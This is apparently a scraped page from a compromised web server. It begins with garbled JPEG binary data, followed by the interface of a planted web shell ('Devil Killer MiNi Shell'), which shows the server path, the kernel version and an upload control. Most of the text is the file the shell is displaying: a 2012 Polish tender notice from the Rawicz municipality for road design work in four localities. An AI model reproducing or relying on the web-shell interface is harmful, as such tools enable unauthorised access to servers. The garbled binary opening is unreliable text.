JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120425/93311-N-2012.html

<p class="kh_header"><b>Rawicz: Opracowanie dokumentacji projektowych na przebudowę dróg gminnych w Szymanowie, Masłowie, Rawiczu i Dąbrówce</b><br>
<b>Numer ogłoszenia: 93311 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowych na przebudowę dróg gminnych w Szymanowie, Masłowie, Rawiczu i Dąbrówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje usługi projektowe związane z opracowaniem dokumentacji projektowych na:

1)	PAKIET 1 - przebudowa ul. Platanowej w Szymanowie, drogi gminnej nr 810703P (od drogi powiatowej do końca zabudowy) oraz drogi gminnej nr 8106473P (od drogi powiatowej do końca zabudowy) w Szymanowie,  
w ramach zadania Przebudowa drogi we wsi Szymanowo ( w kierunku Sarnowy oraz ul. Platanowej),

2)	PAKIET 2 - przebudowa ul. Wrzosowej, Jaśminowej, Chabrowej, Bocianiej, Żniwnej oraz trzech dróg wewnętrznych w Masłowie,   w ramach zadania Przebudowa dróg we wsi Masłowo,

3)	PAKIET 3 - przebudowa ul. Marcinkowskiego w Rawiczu na odcinku od ul. Sukienniczej do Wałów Powstańców Wielkopolskich wraz z budową kanalizacji deszczowej w ramach zadania Przebudowa ul. Marcinkowskiego na odcinku od ul. Sukienniczej  do Wałów Powstańców Wielkopolskich .

4)	PAKIET 4 - przebudowa drogi we wsi Dąbrówka na odcinku od drogi krajowej nr 5 do końca zabudowy, 
w ramach zadania Przebudowa drogi we wsi Dąbrówka .
                         
2. 	Zakres zamówienia obejmuje w szczególności:
1)	PAKIET 1 -  opracowanie projektów budowlano-wykonawczych oraz zgłoszenie przebudowy  dróg wraz z odwodnieniem w Szymanowie,

2)	PAKIET 2 - opracowanie projektów budowlano-wykonawczych oraz uzyskanie jednego pozwolenia na przebudowę 
                            ulic wraz z budową oświetlenia ulicznego w Masłowie (dotyczy ulic:  Wrzosowej, Jaśminowej,     
                            Chabrowej), 
                        -   opracowanie projektów budowlano-wykonawczych oraz zgłoszenie przebudowy ul. Żniwnej 
                            w Masłowie, 
                        -   opracowanie projektów budowlano-wykonawczych oraz uzyskanie jednego pozwolenia na    
                            przebudowę trzech dróg wewnętrznych wraz z budową kanalizacji deszczowej w Masłowie ( ślepe 
                            uliczki od ul. Żniwnej ),  

                       -  opracowanie projektów budowlano-wykonawczych i uzyskanie decyzji o zezwoleniu na realizację 
                          inwestycji  drogowej polegającej na rozbudowie ul. Bocianiej w Masłowie,

3)	PAKIET 3 - opracowanie projektów budowlano-wykonawczych oraz uzyskanie pozwolenia na przebudowę drogi wraz z budową kanalizacji deszczowej w ul. Marcinkowskiego w Rawiczu ,

4)	PAKIET 4 - opracowanie projektów  budowlano-wykonawczych oraz zgłoszenie przebudowy  drogi w Dąbrówce wraz z odwodnieniem.  

3. 	Szczegółowy opis przedmiotu zamówienia - zakres zamówienia dla poszczególnych pakietów zawarto w załączniku nr 5 do SIWZ. 

4. 	Wykonawca  będzie zobowiązany do opracowania projektów  budowlano - wykonawczych w podanych niżej ilościach osobno dla każdej ulicy, drogi oraz osobno dla każdej branży.








5. Podane w opisie przedmiotu zamówienia dla poszczególnych pakietów (zał. nr 5 do SIWZ) długości dróg, kanalizacji i inne pomiary są wartościami przybliżonymi i mogą ulec zmianie w zależności od wydanych warunków technicznych przyłączenia, opinii, uzgodnień itp.

6.	Wszystkie koszty związane z przygotowaniem odpowiednich wniosków wraz z załącznikami ponosi w całości Wykonawca.

7. 	Wykonawca zobowiązany jest w imieniu Zamawiającego i na jego rzecz uzyskać wymagane zezwolenia, decyzje, oświadczenia, opinie, uzgodnienia i pozwolenia niezbędne do opracowania projektów. W związku z powyższym Zamawiający udzieli pełnomocnictwa do działania w imieniu i na rzecz Gminy Rawicz.

8. 	Koszty związane z opracowaniem projektów, przygotowaniem odpowiednich wniosków wraz z niezbędnymi załącznikami (mapy, projekty, podziały geodezyjne - pakiet 2,  itp.) oraz przedmiarów, kosztorysów zerowych i inwestorskich, specyfikacji technicznych wykonania i odbioru robót budowlanych, dokumentacji geotechnicznej,  zakupienie i aktualizacja podkładów mapowych, uzyskanie wszelkich wymaganych prawem uzgodnień, opinii, oświadczeń, zezwoleń, warunków i decyzji ponosi w całości Wykonawca, w ramach zaproponowanej ceny ofertowej.

9. 	Tereny objęte do opracowania projektów zawierają załączone do SIWZ plany sytuacyjne z zaznaczonym zakresem robót dla poszczególnych pakietów (zał. nr 7 do SIWZ).

10. 	Zaleca się, aby Wykonawca przed sporządzeniem oferty dokonał wizji lokalnej terenu budowy i jego otoczenia, a także zdobył na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy i wykonania zamówienia. Koszt dokonania wizji lokalnej terenu budowy ponosi Wykonawca.

11. 	Wykonawca jest zobowiązany do opracowania dokumentacji projektowej w oparciu o obowiązujące przepisy prawne, w szczególności o wymogi wynikające z Prawa budowlanego oraz przepisy wykonawcze  jak również uwzględnić warunki i wymagania określone w wydanych opiniach i uzgodnieniach. Zakres i treść projektów budowlanych powinna być dostosowana do specyfiki i charakteru obiektu oraz stopnia skomplikowania robót budowlanych. 
Wykonawca w trakcie prac projektowych jest zobowiązany informować Zamawiającego  o stopniu zaawansowania prac oraz o proponowanych rozwiązaniach projektowych.  Zamawiający zastrzega sobie prawo do oceny, korekty i akceptacji proponowanych rozwiązań  w trakcie prowadzonych prac projektowych. 

Ponadto w ramach ceny ofertowej każdy Wykonawca będzie zobowiązany do:
1)	przyjazdu do siedziby Zamawiającego celem zaprezentowania postępu prac projektowych ,
2)	konsultowania (na roboczo) z Zamawiającym zaproponowanych rozwiązań, 
3)	poniesienia kosztów badań podłoża gruntowego ,

12. 	Złożone przez Wykonawcę projekty (zakres i i forma) muszą gwarantować podstawę do ogłoszenia przetargu a następnie do rozpoczęcia i wykonania robót budowlanych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY  przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust.1 pkt  6  ustawy, stanowiących  
         nie więcej niż  50% (dla każdego pakietu) wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień,  
	w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia  na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie dla pakietu 1,3 i 4.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia  na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ). 

ZAMAWIAJĄCY USTALA WARUNEK DLA PAKIETU 2  (przebudowa i rozbudowa dróg w Masłowie) 
Wykonawca musi posiadać niezbędną wiedzę i doświadczenie do realizacji niniejszego zamówienia (pakietu 2). Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca wykaże na podstawie złożonych dokumentów, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie świadczył usługi projektowe związane z opracowaniem projektu budowlanego związanego z budową drogi publicznej zbiorczej lub wyższej klasy drogi.  
Warunek ten zostanie uznany za spełniony jeżeli Wykonawca udokumentuje, że zaprojektował co najmniej jedną drogę  
      publiczną klasy zbiorczej lub klasy wyższej o długości 500 m.   

Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia  na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ) wraz z załączonym do oferty wykazem wykonanych zadań (załącznik nr 4 do SIWZ)  oraz dokumentami potwierdzającymi, że usługi wymienione w wykazie zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniona i podpisana przez Wykonawcę oferta przetargowa (załącznik nr 1 do SIWZ).

2)	Oryginał pełnomocnictwa do reprezentowania ( o ile ofertę składa pełnomocnik)  lub kopia pełnomocnictwa poświadczona przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :

1)	w przypadku wystąpienia problemów w uzyskaniu dokumentów niezbędnych do opracowania projektów w tym stosownych decyzji, itp. na uzasadniony wniosek Wykonawcy, pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona,
2)	w przypadku wykonania usług zamiennych lub odstąpienia od realizacji części usług i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
3)	wystąpienia usług dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,
4)	na uzasadniony wniosek Wykonawcy zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona (np. usługi uzupełniające),
5)	wystąpienie zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,
6)	wprowadzenie lub zmiana zgłoszonych w ofercie części usług wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego,
7)	zmiana terminu realizacji zamówienia,
8)	zmiany urzędowej wysokości stawki podatku VAT,
9)	zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za realizację zamówienia itp.),
10)	przekształcenie którejkolwiek ze stron umowy,
11)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna dla Zamawiającego,
12)	innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - w Urzędzie Miejskim Gminy Rawicz, ul. Piłsudskiego 21, 63-900 Rawicz, pokój 111 - po wpłaceniu należności w kasie Urzędu lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego - sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz, ul. Piłsudskiego 21 pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowe ze środków Unii Europejskiej. 2. Wszelkie oświadczenia, wnioski, zawiadomienia, wezwania oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie. 3. ZAMAWIAJĄCY dopuszcza również możliwość porozumiewania się OBU STRON (Wykonawca, Zamawiający) za pomocą: faksu (65) 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl 4. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem lub pocztą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 7. Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia o których mowa w art. 29 ust. 4.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1. Przebudowa dróg gminnych w Szymanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje w szczególności:
1)	PAKIET 1 -  opracowanie projektów budowlano-wykonawczych oraz zgłoszenie przebudowy  dróg wraz 
                     z odwodnieniem w Szymanowie.
Wykonawca po opracowaniu projektów oraz zgłoszeniu do właściwego organu przebudowy ulicy, dróg z odwodnieniem (wraz z niezbędnymi uzgodnieniami i opiniami) oraz ewentualnej przebudowy kanalizacji deszczowej, będzie zobowiązany do zdania Zamawiającemu niżej wymienione dokumenty:
1)	po 3 egzemplarze projektu budowlano - wykonawczego osobno dla każdej drogi  wraz z wszystkimi w tym zakresie uzgodnieniami + 1 egzemplarz w wersji elektronicznej w formacie dwg (nie nowszy niż Auto Cad 2006) lub dxf oraz w pdf,
2)	2 egzemplarze specyfikacji technicznej wykonania i odbioru robót budowlanych w/w przedmiotu zamówienia + 1 egzemplarz w wersji elektronicznej w Word i pdf,
3)	1 komplet szczegółowego kosztorysu inwestorskiego i zerowego wraz z przedmiarem robót + 1 egzemplarz
w wersji elektronicznej wykonane w formacie kst lub ath na płycie CD lub dyskietce,
4)	3 egzemplarze dotyczące bezpieczeństwa i ochrony zdrowia (może stanowić część składową projektu budowlano -wykonawczego) + 1 egzemplarz w wersji elektronicznej,
5)	ostateczną  decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, 
6)	zgłoszenie właściwemu organowi rozpoczęcie robót związanych z przebudową dróg oraz ewentualną przebudowę kanalizacji deszczowej (wniosek winien być potwierdzony przez organ budowlany - Starostwo Powiatowe w Rawiczu),   
7)	oświadczenie, że opracowana dokumentacja projektowa jest zgodna z obowiązującymi przepisami oraz zasadami wiedzy technicznej,
8)	oświadczenie o przeniesieniu na rzecz Zamawiającego wszelkich uprawnień wynikających z tytułu praw autorskich oraz pokrewnych, jak również wyrażenie zgody na wykorzystanie dokumentacji projektowej do celów opisu przedmiotu zamówienia i udostępnienia jej w formie elektronicznej oraz papierowej przy ogłaszaniu przetargu na roboty budowlane.
9)	podkłady mapowe wykorzystane do prac projektowych - do zdania Zamawiającemu.

Ilość dokumentów wymienionych wyżej  należy złożyć u ZAMAWIAJĄCEGO. 
Zakres ten nie obejmuje tych egzemplarzy projektów, które Wykonawcy będą potrzebne do  złożenia we właściwym organie architektoniczno - budowlanym, celem uzyskania warunków, uzgodnień, pozwoleń. Przy wycenie przedmiotu zamówienia należy uwzględnić ilość egzemplarzy przeznaczonych dla ZAMAWIAJĄCEGO, jak również te, które należy złożyć w innych organach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2. Przebudowa i rozbudowa ulic w Masłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje w szczególności:
PAKIET 2 - opracowanie projektów budowlano-wykonawczych oraz uzyskanie jednego pozwolenia na przebudowę 
                            ulic wraz z budową oświetlenia ulicznego w Masłowie (dotyczy ulic:  Wrzosowej, Jaśminowej,     
                            Chabrowej), 
                        -   opracowanie projektów budowlano-wykonawczych oraz zgłoszenie przebudowy ul. Żniwnej 
                            w Masłowie, 
                        -   opracowanie projektów budowlano-wykonawczych oraz uzyskanie jednego pozwolenia na    
                            przebudowę trzech dróg wewnętrznych wraz z budową kanalizacji deszczowej w Masłowie ( ślepe 
                            uliczki od ul. Żniwnej ),  

                       -  opracowanie projektów budowlano-wykonawczych i uzyskanie decyzji o zezwoleniu na realizację 
